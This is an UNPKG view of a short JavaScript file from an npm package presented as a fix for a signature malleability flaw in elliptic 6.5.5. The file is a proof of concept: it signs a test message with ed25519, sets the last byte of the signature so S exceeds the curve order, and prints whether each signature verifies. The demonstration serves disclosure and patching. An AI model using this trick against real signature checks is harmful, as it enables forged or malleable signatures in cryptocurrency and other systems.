UNPKG

@smartledger/elliptic-fix

Version:

Security fix for signature malleability vulnerability in Elliptic package v6.5.5 used by bsv@1.5.6

github.com/smartledger/elliptic-fix

smartledger/elliptic-fix

20 lines (15 loc) 751 B
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
const elliptic = require('elliptic'); const ed = new elliptic.eddsa('ed25519'); // Generate a key pair const key = ed.keyFromSecret('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'); const msg = Buffer.from('test message'); // Create a valid signature const sig = key.sign(msg); // Demonstrate vulnerability by creating a malleable signature // This will pass verification despite being invalid const malleableSig = Buffer.from(sig); // Modify S value to be >= n (curve order) // This should fail verification but doesn't in 6.5.5 malleableSig[63] = 0xff; // Make S very large console.log('Original signature verification:', key.verify(msg, sig)); console.log('Malleable signature verification:', key.verify(msg, malleableSig));